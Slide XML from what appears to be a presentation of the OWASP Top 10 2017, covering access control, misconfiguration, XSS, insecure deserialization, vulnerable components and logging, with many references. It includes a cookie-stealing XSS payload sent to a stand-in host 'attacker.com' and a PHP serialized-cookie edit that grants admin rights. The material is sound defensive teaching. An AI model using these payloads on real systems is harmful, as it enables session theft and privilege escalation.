              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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If an unauthenticated user can access either page, it’s a flaw.</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 non-admin can access the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="002060"/>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page, this is a flaw.</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Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the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Common access control vulnerabilities include:</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Elevation of privilege.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Acting as a user without being logged in, or acting as an admin when logged in as a user.</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Metadata manipulation, such as replaying or tampering with a JSON Web Token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Accessing API with missing access controls for POST, PUT and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ru-RU" dirty="1" sz="1200" b="1">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Access Controls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V4 Access Control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Authorization Testing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Cheat Sheet:</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Access Control</a:t>
            </a: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CWE-22:</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Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')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CWE-284:</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Improper Access Control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CWE-285:</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Improper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CWE-639:</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Authorization Bypass Through User-Controlled Key</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PortSwigger:</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Exploiting CORS Misconfiguration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A5</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4"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and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5"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="90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Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain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Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT, etc), controller, direct object references, etc.</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 comes with sample applications that are not removed from the production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These sample applications have known security flaws attackers use to compromise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one of these applications  is the admin console, and default accounts weren’t changed the attacker logs in with default passwords and takes over.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#2</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Directory listing is not disabled on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An attacker discovers they can simply list directories.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finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code.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then finds a serious access control flaw in the application.</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#3</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server’s configuration allows de-tailed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>error messages, e.g. stack traces, to be returned to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potentially exposes sensitive information or underlying flaws such as component versions that are known to be vulnerable.</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#4</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cloud service provider has default sharing permissions open to the Internet by other CSP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software is out of date or vulnerable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6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Configuration Management</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Testing for Error Codes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Security Headers Project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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>V19 Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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NIST Guide to General Server Hardening</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1"/>
              </a:rPr>
              <a:t>CWE-2</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Environmental Security Flaws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CWE-16:</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Configuration</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CWE-388:</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Error Handling</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CIS Security Configuration Guides/Benchmarks</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Amazon S3 Bucket Discovery and Enumeration</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Development, QA, and production environments should all be configured identically, with different credentials used in each environment.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Remove or do not install unused features and frameworks.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 particular, review cloud storage permissions (e.g. S3 bucket permissions).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Sending security directives to clients, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Security Headers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A6</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Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.</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Occasionally, such flaws result in a complete system compromise.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>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b="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page += "&lt;input name='creditcard' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  value=</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request.getParameter("CC")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&gt;&lt;script&gt;document.location=</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http://www.attacker.com/cgi-bin/cookie.cgi?</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foo=</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+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Attackers can use XSS to defeat any automated Cross-Site Request Forgery ( CSRF) defense the application might employ.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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Reflected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includes unvalidated and unescaped user input as part of HTML output.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successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser.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Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.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Stored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stores unsanitized user input that is viewed at a later time by another user or an administrator.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Stored XSS is often considered a high or critical risk.</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JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to 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Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.</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DOM node replacement or defacement (such as trojan login panels),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1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Encode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Validate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V5</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Testing for Reflected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Testing for Stored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DOM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Cheat Sheet:</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DOM based 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Cheat Sheet:</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XSS Filter Evasion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Java Encoder Project</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CWE-79:</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Improper neutralization of user supplied input</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PortSwigger:</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Client-side template injection</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can be achieved by:</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When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in 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A7</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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ru-RU" dirty="1" sz="900" b="0" i="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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rPr>
              <a:t>Applications and APIs will be vulnerable if they deserialize hostile or tampered objects supplied by an attacker.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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ru-RU" dirty="1" sz="90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Remote- and inter-process communication (RPC/IPC)</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Databases, cache servers, file systems</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HTTP cookies, HTML form parameters, API authentication tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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React application calls a set of Spring Boot microservices.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Being functional programmers, they tried to ensure that their code is immutable.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solution they came up with is serializing user state and passing it back and forth with each request.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notices the "R00" Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.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PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:</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a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>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Cheat Sheet:</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Deserialization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Validate All Inputs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AppSecEU 2016:</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Surviving the Java Deserialization Apocalypse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AppSecUSA 2017:</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Friday the 13th JSON Attacks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CWE-502:</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Deserialization of Untrusted Data</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Java Unmarshaller Security</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AppSec Cali 2015:</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Marshalling Pickles</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A8</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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1100" baseline="0" b="1">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b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>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4"/>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It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address 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The impact of deserialization flaws cannot be understated.</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dirty="1" sz="1400" b="1">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b="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Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component).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Some example exploitable component vulnerabilities discovered are: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CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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For example, the Shodan IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1"/>
            </a:b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components you directly use as well as nested dependencies.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is vulnerable, unsupported, or out of date.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ru-RU" dirty="1" b="1" sz="90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latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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800" b="1">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V1 Architecture, design and threat modelling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Map Application Architecture (OTG-INFO-010)</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Virtual Patching Best Practices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National Vulnerability Database (NVD)</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7"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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ru-RU" dirty="1" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>and Tools</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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>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DependencyCheck</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6"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc. Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>NVD</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rPr>
              <a:t>for vulnerabilities in the components.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Use software composition analysis tools to automate the process.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Subscribe to email alerts for security vulnerabilities related to components you use.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Only obtain components from official sources over secure links.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patching is not possible, consider deploying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1"/>
            </a:b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A9</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Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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Prevalence of this issue is very widespread.</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Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>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Depending on the assets you are protecting, perhaps this risk should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open source project forum software run by a small team was hacked using a flaw in its software.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attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents.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Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach.</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forum software project is no longer active as a result of this issue.</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scans for users using a common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They can take over all accounts using this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other users, this scan leaves only one false login behind.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After some days, this may be repeated with a different password.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major US retailer reportedly had an internal malware analysis sandbox analyzing attachments.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software had detected potentially unwanted software, but no one responded to this detection.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had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</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Penetration testing and scans by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tools (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) do not trigger alerts.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ru-RU" dirty="1" sz="90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Implement Logging and Intrusion Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>V8 Logging and Monitoring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Detailed Error Code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Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">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CWE-223:</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Omission of Security-relevant Information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CWE-778:</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Insufficient Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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high-value transactions have an audit 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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity with the OWASP ModSecurity Core Rule Set</a:t>
